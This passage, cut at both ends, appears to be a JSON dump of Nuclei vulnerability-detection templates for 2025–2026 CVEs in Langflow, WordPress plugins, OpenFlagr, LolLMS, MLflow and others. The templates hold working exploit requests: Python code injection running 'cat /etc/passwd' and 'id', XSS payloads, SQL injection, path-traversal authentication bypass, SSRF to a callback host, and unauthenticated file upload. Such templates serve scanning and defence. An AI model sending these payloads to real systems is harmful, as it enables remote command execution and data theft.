CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-0770\n    epss-score: 0.63839\n    epss-percentile: 0.99183\n    cwe-id: CWE-94\n  metadata:\n    verified: true\n    max-request: 2\n    fofa-query: title=\"Langflow\"\n    shodan-query: title:\"Langflow\"\n  tags: cve,cve2026,langflow,rce,authenticated,vuln,vkev,kev\n\nvariables:\n  username: \"langflow\"\n  password: \"langflow\"\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        POST /api/v1/login HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        username={{username}}&password={{password}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        words:\n          - \"access_token\"\n          - \"token_type\"\n        condition: and\n        internal: true\n\n      - type: word\n        part: content_type\n        words:\n          - \"application/json\"\n        internal: true\n\n      - type: status\n        status:\n          - 200\n        internal: true\n\n    extractors:\n      - type: regex\n        name: token\n        part: body\n        group: 1\n        internal: true\n        regex:\n          - '\"access_token\"\\s*:\\s*\"([^\"]+)\"'\n\n  - raw:\n      - |\n        POST /api/v1/validate/code HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        Authorization: Bearer {{token}}\n\n        {\"code\":\"\\ndef exploit(\\n    _=( lambda r: (_ for _ in ()).throw(Exception(f\\\"OUTPUT:\\\\n{r.stdout}{r.stderr}\\\")) )(\\n        __import__('subprocess').run('cat /etc/passwd', shell=True, capture_output=True, text=True)\\n    )\\n):\\n    pass\\n\"}\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - \"root:.*:0:0:\"\n\n      - type: word\n        part: content_type\n        words:\n          - \"application/json\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100f9d2a56ab0305d53936cda67744ff3835d3b692510b1237ea3c04249dacd7004022100a2253da925cdf960dd9107420950bac459af3069a374e4d03e4f0dd56b7877d6:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-0770.yaml","vuln_id":"cve-2026-0770"},{"raw":"id: CVE-2026-0768\n\ninfo:\n  name: Langflow <=1.2.x - Unauthenticated Remote Code Execution via validate_code\n  author: DhiyaneshDk\n  severity: critical\n  description: |\n    Langflow <= 1.2.x exposes POST /api/v1/validate/code without any authentication. The endpoint calls validate_code() which exec()s user-supplied Python code. Default-argument expressions in Python execute at function-definition time, allowing arbitrary OS command execution without authentication.\n  impact: |\n    An unauthenticated attacker can execute arbitrary OS commands on the server running Langflow.\n  remediation: |\n    Upgrade Langflow to a version that requires authentication on the validate/code endpoint.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-0768\n    - https://www.pruva.dev/reproductions/REPRO-2026-00342\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-0768\n    epss-score: 0.07775\n    epss-percentile: 0.94377\n    cwe-id: CWE-94\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: langflow-ai\n    product: langflow\n  tags: cve,cve2026,langflow,rce,code-injection,unauth,vkev\n\nhttp:\n  - raw:\n      - |\n        POST /api/v1/validate/code HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"code\": \"def exploit(cd=exec('raise Exception(__import__(\\\"subprocess\\\").check_output(\\\"id\\\", shell=True))')): pass\"}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains_all(body, \"uid=\", \"gid=\", \"function\")'\n          - 'status_code == 200'\n        condition: and\n\n    extractors:\n      - type: regex\n        part: body\n        group: 1\n        regex:\n          - '(uid=[0-9]+\\([a-z_]+\\)[^ ]*)'\n# digest: 4b0a00483046022100a88dbf4a16f62f8cdd06e83b78301a5e3b8de8f0b9a152ca377b8734d9e5261a0221009b9fb2f8527883b93a570d65322cc764f608f5edd52e1198e3a6b7eb616aad75:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-0768.yaml","vuln_id":"cve-2026-0768"},{"raw":"id: CVE-2026-0743\n\ninfo:\n  name: WP Content Permission <= 1.2 - Cross-Site Scripting\n  author: iamatownboy\n  severity: medium\n  description: |\n    The WP Content Permission plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'ohmem-message' parameter in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.\n  impact: |\n    Authenticated attackers with administrator-level access can inject scripts that execute in other users' browsers.\n  remediation: |\n    Update WP Content Permission to a version newer than 1.2.\n  reference:\n    - https://www.wordfence.com/threat-intel/vulnerabilities/id/e44403cd-1cee-43c4-aabc-3eaad433c020?source=cve\n    - https://plugins.trac.wordpress.org/browser/wp-content-permission/tags/1.2/admin/views/admin.php#L74\n    - https://plugins.trac.wordpress.org/browser/wp-content-permission/trunk/admin/views/admin.php#L74\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-0743\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N\n    cvss-score: 4.4\n    cve-id: CVE-2026-0743\n    epss-score: 0.00576\n    epss-percentile: 0.46201\n    cwe-id: CWE-79\n  metadata:\n    verified: true\n    max-request: 3\n    vendor: orenhav\n    product: wp-content-permission\n    framework: wordpress\n    publicwww-query: \"/wp-content/plugins/wp-content-permission/\"\n  tags: cve,cve2026,wordpress,wp,wp-plugin,wp-content-permission,xss,stored,authenticated\n\nvariables:\n  xss: \"{{randstr}}<script>alert(1)</script>\"\n\nflow: http(1) && http(2) && http(3)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-content/plugins/wp-content-permission/readme.txt\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - contains(body, \"WP Content Permission\")\n          - compare_versions(version, \"<= 1.2\")\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: version\n        part: body\n        group: 1\n        regex:\n          - '(?i)Stable tag:\\s*([0-9.]+)'\n        internal: true\n\n  - raw:\n      - |\n        POST /wp-login.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n        Cookie: wordpress_test_cookie=WP+Cookie+check\n\n        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1\n\n    cookie-reuse: true\n\n    matchers:\n      - type: dsl\n        dsl:\n          - status_code == 302\n          - contains(header, \"wordpress_logged_in\")\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /wp-admin/admin.php?page=wp-content-permission HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n        Origin: {{BaseURL}}\n        Referer: {{BaseURL}}/wp-admin/admin.php?page=wp-content-permission\n\n        ohmem-message={{url_encode(xss)}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"{{xss}}\"\n\n      - type: word\n        part: content_type\n        words:\n          - \"text/html\"\n# digest: 4a0a00473045022100a7c296a4ae8075f6b10fa2b0e9a4664699536a8551efa661ddbe65270f3efc9502204cf056f9fe537e54b162f62c7af11e4e7a9c1bbcacd6dcc638cc7085ab58f648:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-0743.yaml","vuln_id":"cve-2026-0743"},{"raw":"id: CVE-2026-0740\n\ninfo:\n  name: Ninja Forms File Uploads <= 3.3.26 - Arbitrary File Upload\n  author: whattheslime\n  severity: critical\n  description: |\n    Ninja Forms File Uploads plugin for WordPress versions up to and including 3.3.26 is vulnerable to unauthenticated arbitrary file upload which could lead to remote code execution.\n  impact: |\n    Unauthenticated attackers can upload arbitrary files, potentially leading to remote code execution and full server compromise.\n  remediation: |\n    Update Ninja Forms File Uploads plugin to version 3.3.27 or later.\n  reference:\n    - https://www.wordfence.com/blog/2026/04/50000-wordpress-sites-affected-by-arbitrary-file-upload-vulnerability-in-ninja-forms-file-upload-wordpress-plugin/\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-0740\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-0740\n    epss-score: 0.62903\n    epss-percentile: 0.9916\n    cwe-id: CWE-434\n  metadata:\n    verified: true\n    max-request: 4\n    vendor: ninjaforms\n    product: ninja_forms_file_uploads\n    cpe: cpe:2.3:a:ninjaforms:ninja_forms_file_uploads:*:*:*:*:*:wordpress:*:*\n    shodan-query: http.html:\"nfpluginsettings.js?ver=\"\n    fofa-query: body=\"nfpluginsettings.js?ver=\"\n  tags: cve,cve2026,wordpress,wp,wp-plugin,ninja-forms-uploads,file-upload,rce,vkev\n\nvariables:\n  field_id: \"{{rand_int(1000000000, 9999999999)}}\"\n\nflow: http(1) && http(2) && http(3)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}\"\n\n    redirects: true\n    max-redirects: 2\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(body, \"nfpluginsettings.js\")'\n          - 'status_code == 200'\n          - 'compare_versions(version, \"<= 3.3.26\")'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: version\n        part: body\n        group: 1\n        regex:\n          - 'nfpluginsettings\\.js\\?ver=([0-9.]+)'\n        internal: true\n\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        action=nf_fu_get_new_nonce&field_id={{field_id}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(body, \"\\\"success\\\":true\")'\n          - 'contains(body, \"\\\"nonce\\\":\")'\n          - 'status_code == 200'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: nonce\n        internal: true\n        part: body\n        group: 1\n        regex:\n          - '\"nonce\":\"([a-z0-9]+)\"'\n\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: multipart/form-data; boundary=nucleiboundary\n\n        --nucleiboundary\n        Content-Disposition: form-data; name=\"action\"\n\n        nf_fu_upload\n        --nucleiboundary\n        Content-Disposition: form-data; name=\"nonce\"\n\n        {{nonce}}\n        --nucleiboundary\n        Content-Disposition: form-data; name=\"form_id\"\n\n        {{field_id}}\n        --nucleiboundary\n        Content-Disposition: form-data; name=\"field_id\"\n\n        {{field_id}}\n        --nucleiboundary\n        Content-Disposition: form-data; name=\"files-{{field_id}}\"; filename=\"image.jpg\"\n        Content-Type: image/jpeg\n\n        {{randstr}}\n        --nucleiboundary\n        Content-Disposition: form-data; name=\"image_jpg\"\n\n        {{randstr}}.txt\n        --nucleiboundary--\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains_all(body, \"data\\\":{\\\"files\", \"tmp_name\\\":\", \"new_tmp_key\\\":\")'\n          - 'status_code == 200'\n        condition: and\n# digest: 4b0a00483046022100a7aeb474e1eb5f920d16ddb98f7ab1e27a80a64d9a8c7ecd0921116511c1baf3022100d9e10ef0fe21aecd813f5c2ab90f066127baca6a089374d8a46b8c66fe0c0a3d:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-0740.yaml","vuln_id":"cve-2026-0740"},{"raw":"id: CVE-2026-0717\n\ninfo:\n  name: LottieFiles for Gutenberg <= 3.0.0 - Unauthenticated Settings Disclosure\n  author: str4k3r\n  severity: medium\n  description: |\n    The LottieFiles – Lottie block for Gutenberg plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.0.0 via the `/wp-json/lottiefiles/v1/settings/` REST API endpoint. This makes it possible for unauthenticated attackers to retrieve the site owner's LottieFiles.com account credentials including their API access token and email address when the 'Share LottieFiles account with other WordPress users' option is enabled.\n  impact: |\n    Unauthenticated attackers can retrieve API tokens and email addresses, compromising account security and privacy.\n  remediation: |\n    Update to the latest version beyond 3.0.0.\n  reference:\n    - https://www.wordfence.com/threat-intel/vulnerabilities/id/19b159ca-4b41-48b4-880d-9b9dc44b3463?source=cve\n    - https://plugins.trac.wordpress.org/browser/lottiefiles/tags/3.0.0/src/common.php?marks=21,122#L21\n    - https://plugins.trac.wordpress.org/changeset/3442469/\n  classification:\n    cve-id: CVE-2026-0717\n    epss-score: 0.00699\n    epss-percentile: 0.51718\n  metadata:\n    verified: true\n    max-request: 1\n  tags: cve,cve2026,wordpress,lottiefiles,gutenberg,exposure,unauth\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-json/lottiefiles/v1/settings/\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"is_block_logged_in\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100cae6c779141f042b318537563ed717367296d62dafe1a5ff7268b59d3ab812c00220206cc9d266ffd70b19f1ebaa2d124f72298d64fba6c5e75cbc38045b972adee2:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-0717.yaml","vuln_id":"cve-2026-0717"},{"raw":"id: CVE-2026-0702\n\ninfo:\n  name: VidShop for WooCommerce <= 1.1.4 - SQL Injection\n  author: str4k3r\n  severity: high\n  description: |\n    VidShop – Shoppable Videos for WooCommerce plugin for WordPress <= 1.1.4 contains a time-based SQL injection caused by insufficient escaping of the 'fields' parameter, letting unauthenticated attackers extract sensitive database information.\n  impact: |\n    Unauthenticated attackers can extract sensitive information from the database, potentially compromising data confidentiality.\n  remediation: |\n    Update to the latest version of VidShop – Shoppable Videos for WooCommerce plugin for WordPress.\n  reference:\n    - https://plugins.trac.wordpress.org/browser/vidshop-for-woocommerce/trunk/includes/rest-api/v1/class-videos-controller.php#L297\n    - https://plugins.trac.wordpress.org/browser/vidshop-for-woocommerce/trunk/includes/utils/class-query-builder.php#L778\n    - https://www.wordfence.com/threat-intel/vulnerabilities/id/a61d8d2a-742f-45f1-9146-f733b80ef195?source=cve\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-0702\n    epss-score: 0.01348\n    epss-percentile: 0.70228\n    cwe-id: CWE-89\n  metadata:\n    verified: true\n    max-request: 1\n  tags: cve,cve2026,wordpress,woocommerce,vidshop,sqli,unauth\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-json/vsfw/v1/videos?fields=%28SELECT%20424242*2%29%20as%20id\"\n\n    matchers-condition: and\n    matchers:\n      - type: status\n        status:\n          - 200\n\n      - type: word\n        part: body\n        words:\n          - '\"id\":848484'\n# digest: 490a00463044022001ee11461696c9046a36717dd3d4da8738760ed4780e588d1cab481a3f773f4702203dbf2f3a9a153f0a81fea058bfc8ad3fcafe614ac0be6a4d68cf9b3fc163fb74:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-0702.yaml","vuln_id":"cve-2026-0702"},{"raw":"id: CVE-2026-0650\n\ninfo:\n  name: OpenFlagr <= 1.1.18 - Authentication Bypass\n  author: str4k3r\n  severity: critical\n  description: |\n    OpenFlagr <= 1.1.18 contains an authentication bypass caused by improper path normalization handling in HTTP middleware whitelist logic, letting attackers access protected API endpoints without valid credentials, exploit requires crafted requests.\n  impact: |\n    Attackers can bypass authentication to modify feature flags and export sensitive data, compromising system integrity and confidentiality.\n  remediation: |\n    Update to the latest version beyond 1.1.18.\n  reference:\n    - https://github.com/advisories/GHSA-rwp9-5g7q-73q3\n    - https://github.com/openflagr/flagr/commit/fe83dc87aa404a57554aa5839ac450f55c203570\n    - https://dreyand.rs/code%20review/golang/2026/01/03/0day-speedrun-openflagr-less-1118-authentication-bypass\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-0650\n  classification:\n    cve-id: CVE-2026-0650\n    epss-score: 0.01316\n    epss-percentile: 0.69513\n    cwe-id: CWE-22\n    cvss-score: 9.3\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\n  metadata:\n    vendor: openflagr\n    product: flagr\n    verified: true\n    max-request: 1\n    shodan-query: http.html:\"Flagr\"\n    fofa-query: body=\"Flagr\"\n  tags: cve,cve2026,openflagr,authbypass,unauth,traversal\n\nhttp:\n  - raw:\n      - |\n        GET /api/v1/health/../flags HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_all(body, \"\\\"dataRecordsEnabled\\\"\", \"\\\"variants\\\"\", \"\\\"key\\\"\")'\n        condition: and\n# digest: 4b0a0048304602210081f30186984ed6ecd7fc4f52f838570eaa3df8c8caf4e8b110248780933a4f84022100b33c128cff8ccd648032330b67fbafe0b8a816be12900d9ab1580660c4a38fe2:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-0650.yaml","vuln_id":"cve-2026-0650"},{"raw":"id: CVE-2026-0594\n\ninfo:\n  name: WordPress List Site Contributors < 1.1.8 - Reflected XSS\n  author: m4sh_wacker\n  severity: medium\n  description: |\n    WordPress List Site Contributors plugin < 1.1.8 contains a reflected XSS caused by insufficient sanitization and escaping of the 'alpha' parameter, letting unauthenticated attackers inject scripts, exploit requires user interaction.\n  impact: |\n    Unauthenticated attackers can inject scripts that execute in users browsers, potentially stealing data or performing actions on their behalf.\n  remediation: Update to a version later than 1.1.8 or the latest available version.\n  reference:\n    - https://github.com/m4sh-wacker/CVE-2026-0594-ListSiteContributors-Plugin-Exploit\n    - https://www.wordfence.com/threat-intel/vulnerabilities/id/026a2e0d-4d30-4133-9118-055026aa9f4a?source=cve\n  metadata:\n    verified: true\n    max-request: 1\n    publicwww-query: \"plugins/list-site-contributors/\"\n  tags: cve,cve2026,wordpress,wp,wp-plugin,list-site-contributors,xss\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET /wp-json/wp/v2/pages HTTP/1.1\n        Host: {{Hostname}}\n\n    iterate-all: true\n\n    extractors:\n      - type: json\n        name: slug\n        part: body\n        json:\n          - '.[] | select(.content.rendered | contains(\"alpha=\")) | .slug'\n        internal: true\n\n  - raw:\n      - |\n        GET /{{slug}}/?alpha=%22%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"svg/onload=alert(document.domain)\"\n# digest: 4a0a004730450220066540dc800a841bdd86d63464f8579b634ecc4c302510b5262507aeb5029bfa022100f069cff959139adc9675a8af3add226349b78aeb95767889e73e3c875198a06d:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-0594.yaml","vuln_id":"cve-2026-0594"},{"raw":"id: CVE-2026-0561\n\ninfo:\n  name: Shield Security <= 21.0.8 - Unauthenticated Reflected XSS\n  author: str4k3r\n  severity: medium\n  description: |\n    Shield Security WordPress plugin <= 21.0.8 contains a reflected cross-site scripting caused by insufficient input sanitization and output escaping in the 'message' parameter, letting unauthenticated attackers inject scripts, exploit requires user interaction.\n  impact: |\n    Unauthenticated attackers can inject scripts that execute in users' browsers, potentially stealing data or performing actions on behalf of users.\n  remediation: |\n    Update to a version later than 21.0.8 or the latest available version.\n  reference:\n    - https://research.cleantalk.org/cve-2026-0561/\n    - https://www.wordfence.com/threat-intel/vulnerabilities/id/cb49eb5f-c1ff-4440-8b53-c2515e65da27?source=cve\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-0561\n  classification:\n    cve-id: CVE-2026-0561\n    epss-score: 0.00503\n    epss-percentile: 0.42034\n    cwe-id: CWE-79\n    cvss-score: 6.1\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n  metadata:\n    vendor: wp-simple-firewall\n    product: shield-security\n    framework: wordpress\n    verified: true\n    max-request: 1\n    shodan-query: http.html:\"/wp-content/plugins/wp-simple-firewall/\"\n    fofa-query: body=\"/wp-content/plugins/wp-simple-firewall/\"\n  tags: cve,cve2026,wordpress,wp-plugin,shield-security,unauth,xss\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/?action=shield_action&ex=display_full_page_dynamic&render_slug=render_shield_wploginreplica_header&title=nuclei&message=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"<script>alert(document.domain)</script>\"\n          - 'id=\"login\"'\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a0047304502206a32cadd8d02a1776777cfd536729f9fa1ab7c41bca1db7be862e18e10d48906022100b800091a6e199f00e1f74786e5a355e0d6993139b981fef97b05d4553c00c173:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-0561.yaml","vuln_id":"cve-2026-0561"},{"raw":"id: CVE-2026-0560\n\ninfo:\n  name: LolLMS < 2.2.0 - Server-Side Request Forgery\n  author: ritikchaddha\n  severity: high\n  description: |\n    A Server-Side Request Forgery (SSRF) vulnerability exists in parisneo/lollms versions prior to 2.2.0. The /api/files/export-content endpoint processes Markdown image URLs by downloading them via _download_image_to_temp() in backend/routers/files.py without any validation, allowing an unauthenticated attacker to supply arbitrary URLs (e.g. cloud metadata endpoints or internal services) that the server will fetch, enabling internal network access, cloud metadata access, information disclosure, port scanning, and potentially remote code execution.\n  impact: |\n    Attackers can access internal network services, cloud metadata, and potentially execute remote code.\n  remediation: |\n    Update to version 2.2.0 or later.\n  reference:\n    - https://huntr.com/bounties/65e43a5e-b902-4369-b738-1825285a3ea5\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-0560\n    - https://github.com/parisneo/lollms/commit/76a54f0df2df8a5b254aa627d487b5dc939a0263\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-0560\n    epss-score: 0.01765\n    epss-percentile: 0.77068\n    cwe-id: CWE-918\n  metadata:\n    verified: false\n    max-request: 1\n    vendor: parisneo\n    product: lollms\n    shodan-query: http.title:\"lollms\"\n  tags: cve,cve2026,ssrf,lollms,oast\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"LolLMS\"\n        internal: true\n        case-insensitive: false\n\n  - raw:\n      - |\n        POST /api/files/export-content HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"markdown_text\":\"# SSRF Test\\n\\n![ssrf](http://{{interactsh-url}}/ssrf-probe)\\n\",\"output_format\":\"docx\"}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"http\"\n\n      - type: status\n        status:\n          - 200\n# digest: 490a0046304402202f4e44117899cd8410a782a194d4691292c95ecc993b375864605060f9ccca7002200a9220ccb9f2e9a8145a4ddd2c37f8480bc3c3613b2ce3f760e86d79b1a11b10:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-0560.yaml","vuln_id":"cve-2026-0560"},{"raw":"id: CVE-2026-0558\n\ninfo:\n  name: LolLMS <= 2.2.0 - Unauthenticated File Upload\n  author: KoungQ\n  severity: critical\n  description: |\n    A vulnerability in parisneo/lollms up to and including version 2.2.0 allows unauthenticated users to upload and process files through the /api/files/extract-text endpoint. The endpoint lacks the Depends(get_current_active_user) dependency used by other file-related APIs.\n  impact: |\n    Unauthenticated remote attackers can invoke server-side file processing, which can lead to denial of service through resource exhaustion, information disclosure through processing responses or errors, and bypass of intended access controls.\n  remediation: |\n    Update to a patched version containing commit a6625dc83786ff21d109b0d545ca61b770607ef3 or later. Restrict unauthenticated access to /api/files/extract-text until the update is applied.\n  reference:\n    - https://github.com/parisneo/lollms/commit/a6625dc83786ff21d109b0d545ca61b770607ef3\n    - https://huntr.com/bounties/0a722001-89ce-4c91-b6a6-a55ee5ba2113\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-0558\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-0558\n    epss-score: 0.01936\n    epss-percentile: 0.79194\n    cwe-id: CWE-287\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: parisneo\n    product: lollms\n    shodan-query: http.html:\"lollms\"\n    fofa-query: body=\"lollms\"\n  tags: cve,cve2026,lollms,auth-bypass,file-upload,intrusive\n\nhttp:\n  - raw:\n      - |\n        POST /api/files/extract-text HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: multipart/form-data; boundary=----testFormBoundary{{randstr}}\n\n        ------testFormBoundary{{randstr}}\n        Content-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.txt\"\n        Content-Type: text/plain\n\n        lollms-cve-2026-0558-{{randstr}}\n        ------testFormBoundary{{randstr}}--\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains_all(body, \"lollms-cve-2026-0558-{{randstr}}\", \"\\\"text_content\\\":\")'\n          - 'contains(content_type, \"application/json\")'\n          - 'status_code == 200'\n        condition: and\n# digest: 490a00463044022063ee651156a6d27803981bf0029ae4a22c73357dd33c012f1fae7eabe3fd380502202ca182073b20dec3adfce177ecc51a701952acaa90645bef510e276592a7ca1a:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-0558.yaml","vuln_id":"cve-2026-0558"},{"raw":"id: CVE-2026-0545\n\ninfo:\n  name: MLflow Job API - Authentication Bypass\n  author: DhiyaneshDk\n  severity: critical\n  description: |\n    MLflow latest version contains an authentication bypass caused by unprotected FastAPI job endpoints under /ajax-api/3.0/jobs/* when basic-auth is enabled, letting unauthenticated network clients submit and manage jobs, exploit requires job execution enabled and allowlisted job functions.\n  impact: |\n    Unauthenticated attackers can execute jobs remotely, potentially leading to remote code execution, denial of service, or data exposure.\n  remediation: |\n    Update to the latest version with fixed authentication enforcement on job endpoints.\n  reference:\n    - https://huntr.com/bounties/b2e5b028-9541-4d29-8703-a76f1a3734d8\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-0545\n    - https://github.com/mlflow/mlflow\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\n    cvss-score: 9.1\n    cve-id: CVE-2026-0545\n    epss-score: 0.04392\n    epss-percentile: 0.90871\n    cwe-id: CWE-306\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: mlflow\n    product: mlflow\n    shodan-query: title:\"MLflow\"\n    fofa-query: title=\"MLflow\"\n  tags: cve,cve2026,mlflow,auth-bypass\n\nhttp:\n  - raw:\n      - |\n        POST /ajax-api/3.0/jobs/ HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"job_name\":\"run_task\",\"params\":{\"command\":\"id\"}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains_all(body, \"\\\"job_id\\\":\", \"\\\"job_name\\\":\")'\n          - 'contains(content_type, \"application/json\")'\n          - 'status_code == 200'\n        condition: and\n# digest: 4a0a004730450221008a7048ed2de8ed1b22a6c1585c74babee41286324a6f8078c713e7afc5796178022076a037ae6bc19db2436c0d75fe855f89ded9d343f80949f6c179b4b7cc7e16e3:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-0545.yaml","vuln_id":"cve-2026-0545"},{"raw":"id: CVE-2025-9985\n\ninfo:\n  name: Featured Image from URL (FIFU) <= 5.2.7 - Unauthenticated Information Exposure via Log File\n  author: zer0p0int\n  severity: medium\n  description: |\n    The Featured Image from URL (FIFU) plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 5.2.7 through publicly exposed log files. This makes it possible for unauthenticated attackers to view potentially sensitive information contained in the exposed log files.\n  impact: |\n    Unauthenticated attackers can view sensitive information from exposed log files, potentially leading to information disclosure.\n  remediation: |\n    Update to the latest version of the Featured Image from URL (FIFU) plugin.\n  metadata:\n    verified: true\n    max-request: 2\n    publicwww-query: \"/wp-content/plugins/featured-image-from-url/\"\n  tags: cve,cve2025,wordpress,wp,wp-plugin,unauth,vuln,featured-image-from-url,log,vkev\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-content/uploads/fifu-plugin.log\"\n      - \"{{BaseURL}}/wp-content/uploads/fifu-cloud.log\"\n\n    redirects: true\n    stop-at-first-match: true\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '{\"fifu-dimensions\":'\n          - '\"Invalid size:'\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100ef81f9d253c87043d3d07ed07ac09fbca05db7b5a70a39ae8d9634d2a7a26c510221008d84584d7a0dc981bbe88a4c33cc7b9131ecaccc2f1e12f42b2fe389746a3b0f:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2025/CVE-2025-9985.yaml","vuln_id":"cve-2025-9985"},{"raw":"id: CVE-2025-9808\n\ninfo:\n  name: The Events Calendar <= 6.15.2 - Information Disclosure\n  author: zer0p0int\n  severity: medium\n  description: |\n    The Events Calendar WordPress plugin <= 6.15.2 contains an information disclosure vulnerability caused by REST endpoint exposure, letting unauthenticated attackers extract data about password-protected vendors or venues, exploit requires no authentication.\n  impact: |\n    